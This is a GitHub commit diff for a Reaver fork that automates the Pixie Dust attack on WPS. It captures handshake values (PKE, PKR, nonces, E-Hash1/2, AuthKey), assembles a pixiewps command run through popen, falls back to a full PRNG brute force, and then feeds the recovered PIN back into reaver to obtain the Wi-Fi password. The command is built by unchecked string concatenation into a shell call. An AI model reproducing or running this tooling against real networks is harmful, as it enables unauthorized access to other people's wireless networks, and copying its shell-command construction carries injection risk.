Skip to content

Commit

Permalink
Improved code, updating to use -f option of pixiewps
Browse files Browse the repository at this point in the history
  • Loading branch information
@t6x
t6x committed May 5, 2015
1 parent 714fdcf commit a28b0af
Show file tree
Hide file tree
Showing 7 changed files with 114 additions and 88 deletions.
4 changes: 2 additions & 2 deletions src/argsparser.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -92,11 +92,11 @@ int process_arguments(int argc, char **argv)
switch(c)
{
case 'W':
//set valor para auto get pass
//set default pin generator
set_op_gen_pin(atoi(optarg));
break;
case '0':
//set valor para auto get pass
//set stop in m1
set_stop_in_m1(1);
break;
case 'Z':
Expand Down
11 changes: 6 additions & 5 deletions src/globule.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -142,11 +142,12 @@ struct globals
* function calls.
*/

int op_pixie; /*make pixiewps*/
char cmd_reaver_test[4000]; /*auto reaver with pin */
int op_autopass; /*auto reaver with pin*/
int stop_in_m1;
int op_gen_pin;
int op_pixie; /* make pixiewps */
char cmd_reaver_test[4000]; /* auto reaver with pin */
int op_autopass; /* auto reaver with pin */
int stop_in_m1; /* stop reaver in m1 message */
int op_gen_pin; /* gen default pin */


} *globule;

Expand Down
10 changes: 9 additions & 1 deletion src/wps/t6.h
View file
Original file line number Diff line number Diff line change
Expand Up @@ -4,6 +4,14 @@ char cmd_pixie_aux[4000];
char pixie_buf_aux[4000];
char pixie_buf_aux2[4000];


//fixed size
char pixie_pke[1000]; /* save pke */
char pixie_pkr[1000]; /* save pkr */
char pixie_enonce[100]; /* save e-nonce */
char pixie_rnonce[100]; /* save r-nonce */
char pixie_authkey[100]; /* save AuthKey */
char pixie_ehash1[100]; /* save e-hash1 */
char pixie_ehash2[100]; /* save e-hash2 */

//int op_pixie=0;

19 changes: 5 additions & 14 deletions src/wps/wps_attr_build.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -62,28 +62,19 @@ int wps_build_public_key(struct wps_data *wps, struct wpabuf *msg)
wpabuf_free(wps->dh_pubkey_r);
wps->dh_pubkey_r = pubkey;

if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie," -r ");
}

unsigned char *v;
v = wpabuf_mhead_u8(pubkey);

memset(pixie_pkr,0,sizeof(pixie_pkr));
printf("[P] PKR: ");
int pixiecnt = 0;
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", v[pixiecnt]);
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
}
sprintf(cmd_pixie_aux, "%02x", v[pixiecnt]);
strcat(pixie_pkr, cmd_pixie_aux);
if (pixiecnt != 191) {
printf(":");
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie,":");
}
strcat(pixie_pkr,":");
}
}
printf("\n");
Expand Down
7 changes: 4 additions & 3 deletions src/wps/wps_common.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -129,16 +129,17 @@ int wps_derive_keys(struct wps_data *wps)
wpa_hexdump_key(MSG_DEBUG, "WPS: EMSK", wps->emsk, WPS_EMSK_LEN);

/****** ADD THIS PART ******/
strcat(cmd_pixie," -a ");

memset(pixie_authkey,0,sizeof(pixie_authkey));
printf("[P] AuthKey: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_AUTHKEY_LEN; pixiecnt++) {
printf("%02x", wps->authkey[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", wps->authkey[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_authkey, cmd_pixie_aux);
if (pixiecnt != WPS_AUTHKEY_LEN - 1) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_authkey,":");
}
}
printf("\n");
Expand Down
20 changes: 0 additions & 20 deletions src/wps/wps_enrollee.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -545,26 +545,6 @@ printf("------------------------------------------------------------------------
if (wps_derive_keys(wps) < 0)
return -1;


/****** ADD THIS PART ******/


printf("[P] PKR: ");
int pixiecnt = 0;
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", pk[pixiecnt]);
if (pixiecnt != 191) {
printf(":");
}
}
printf("\n");
/******/






return 0;
}

Expand Down
131 changes: 88 additions & 43 deletions src/wps/wps_registrar.c
View file
Original file line number Diff line number Diff line change
Expand Up @@ -1712,30 +1712,19 @@ static int wps_process_enrollee_nonce(struct wps_data *wps, const u8 *e_nonce)
wps->nonce_e, WPS_NONCE_LEN);

/****** ADD THIS PART ******/
memset(cmd_pixie,0,sizeof(cmd_pixie));
memset(cmd_pixie_aux,0,sizeof(cmd_pixie_aux));
strcat(cmd_pixie,"pixiewps ");

if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie," -n ");
}
memset(pixie_enonce,0,sizeof(pixie_enonce));

printf("[P] E-Nonce: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_NONCE_LEN; pixiecnt++)
{
printf("%02x", wps->nonce_e[pixiecnt]);
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
}
sprintf(cmd_pixie_aux, "%02x", wps->nonce_e[pixiecnt]);
strcat(pixie_enonce, cmd_pixie_aux);
if (pixiecnt != WPS_NONCE_LEN - 1) {
printf(":");
if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{
strcat(cmd_pixie,":");
}
strcat(pixie_enonce,":");
}
}
printf("\n");
Expand Down Expand Up @@ -1799,16 +1788,16 @@ static int wps_process_e_hash1(struct wps_data *wps, const u8 *e_hash1)
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash1", wps->peer_hash1, WPS_HASH_LEN);

/****** ADD THIS PART ******/
strcat(cmd_pixie," -s ");
memset(pixie_ehash1,0,sizeof(pixie_ehash1));
printf("[P] E-Hash1: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
printf("%02x", wps->peer_hash1[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", wps->peer_hash1[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_ehash1, cmd_pixie_aux);
if (pixiecnt != WPS_HASH_LEN - 1) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_ehash1,":");
}
}
printf("\n");
Expand All @@ -1830,35 +1819,47 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)
wpa_hexdump(MSG_DEBUG, "WPS: E-Hash2", wps->peer_hash2, WPS_HASH_LEN);

/****** ADD THIS PART ******/
strcat(cmd_pixie," -z ");
memset(pixie_ehash2,0,sizeof(pixie_ehash2));
printf("[P] E-Hash2: ");
int pixiecnt = 0;
for (; pixiecnt < WPS_HASH_LEN; pixiecnt++) {
printf("%02x", wps->peer_hash2[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", wps->peer_hash2[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_ehash2, cmd_pixie_aux);
if (pixiecnt != WPS_HASH_LEN - 1) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_ehash2,":");
}
}
printf("\n");
/******/

memset(cmd_pixie,0,sizeof(cmd_pixie));

strcat(cmd_pixie,"pixiewps -e ");
strcat(cmd_pixie,pixie_pke);
strcat(cmd_pixie," -r ");
strcat(cmd_pixie,pixie_pkr);
strcat(cmd_pixie," -s ");
strcat(cmd_pixie,pixie_ehash1);
strcat(cmd_pixie," -z ");
strcat(cmd_pixie,pixie_ehash2);
strcat(cmd_pixie," -a ");
strcat(cmd_pixie,pixie_authkey);
strcat(cmd_pixie," -n ");
strcat(cmd_pixie,pixie_enonce);


if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3){
//strcat(cmd_pixie," -S ");
strcat(cmd_pixie," ");
if(globule->dh_small == 1){
strcat(cmd_pixie," -S ");
}
//sprintf(cmd_pixie,"%s -S",cmd_pixie);



if(globule->op_pixie==1 || globule->op_pixie==2 || globule->op_pixie==3)
{

FILE *fpixe;

//printf(" -- cmd pixie : %s",cmd_pixie);

if ((fpixe = popen(cmd_pixie, "r")) == NULL) {
printf("Error opening pipe!\n");
//return -1;
Expand All @@ -1869,6 +1870,9 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)
char *aux_pixie_pin;

memset(pixie_pin, 0, sizeof(pixie_pin));

printf("[+] Running pixiewps with the information, wait ...\n");
//printf("Cmd : %s\n",cmd_pixie);

while (fgets(pixie_buf_aux, 4000, fpixe) != NULL)
{
Expand Down Expand Up @@ -1897,15 +1901,60 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)
//printf("Command not found or exited with error status\n");
//return -1;
}


if(pixie_test == 0)
{
//Pin not found, trying -f (full PRNG brute force)

strcat(cmd_pixie," -f ");

printf("[+] Pin not found, trying -f (full PRNG brute force), this may take around 30 minutes\n");
//printf("Cmd : %s\n",cmd_pixie);

if ((fpixe = popen(cmd_pixie, "r")) == NULL) {
printf("Error opening pipe!\n");
//return -1;
}

while (fgets(pixie_buf_aux, 4000, fpixe) != NULL)
{

printf("[Pixie-Dust] %s", pixie_buf_aux);

aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin not found");
if(aux_pixie_pin != NULL)
{
pixie_test = 0;
//exit(0);
}

aux_pixie_pin = strstr(pixie_buf_aux,"WPS pin:");
if(aux_pixie_pin != NULL)
{
pixie_test = 1;
//exit(0);
//here will get the pin
strncpy(pixie_pin, aux_pixie_pin + 12, 8);
}

}

if(pclose(fpixe)) {
//printf("Command not found or exited with error status\n");
//return -1;
}



}


if((pixie_test == 1) && (globule->op_autopass==1))
{
//here will make the test to get pass

FILE *fpixe_test;

//strcat(globule->cmd_reaver_test," -p ");
//strcat(globule->cmd_reaver_test,pixie_pin);

char cmd_reaver_test_aux[4000];
char cmd_buf_c[5];
Expand Down Expand Up @@ -1935,8 +1984,8 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)

printf("Running reaver with the correct pin, wait ...\n");
printf("Cmd : %s\n\n",cmd_reaver_test_aux);
printf("[Reaver Test] BSSID: %s\n", mac2str(get_bssid(),':'));
printf("[Reaver Test] Channel: %s\n", cmd_buf_c);
printf("[Reaver Test] [+] BSSID: %s\n", mac2str(get_bssid(),':'));
printf("[Reaver Test] [+] Channel: %s\n", cmd_buf_c);
//printf("Command : \n", globule->cmd_reaver_test);
while (fgets(pixie_buf_aux2, 4000, fpixe_test) != NULL)
{
Expand Down Expand Up @@ -1970,9 +2019,6 @@ static int wps_process_e_hash2(struct wps_data *wps, const u8 *e_hash2)

}

//printf(" %s ",cmd_pixie);


return 0;
}

Expand Down Expand Up @@ -2106,24 +2152,23 @@ static int wps_process_pubkey(struct wps_data *wps, const u8 *pk,
return -1;

/****** ADD THIS PART ******/
// memset (cmd_pixie,0,sizeof(cmd_pixie));
strcat(cmd_pixie," -e ");
//sprintf( cmd_pixie, "", cmd_pixie, str2);


memset(pixie_pke,0,sizeof(pixie_pke));
printf("[P] PKE: ");
int pixiecnt = 0;
for (; pixiecnt < 192; pixiecnt++) {
printf("%02x", pk[pixiecnt]);
sprintf(cmd_pixie_aux, "%02x", pk[pixiecnt]);
strcat(cmd_pixie,cmd_pixie_aux);
strcat(pixie_pke, cmd_pixie_aux);
if (pixiecnt != 191) {
printf(":");
strcat(cmd_pixie,":");
strcat(pixie_pke,":");
}
}
printf("\n");
/******/


return 0;
}

Expand Down

0 comments on commit a28b0af

Please sign in to comment.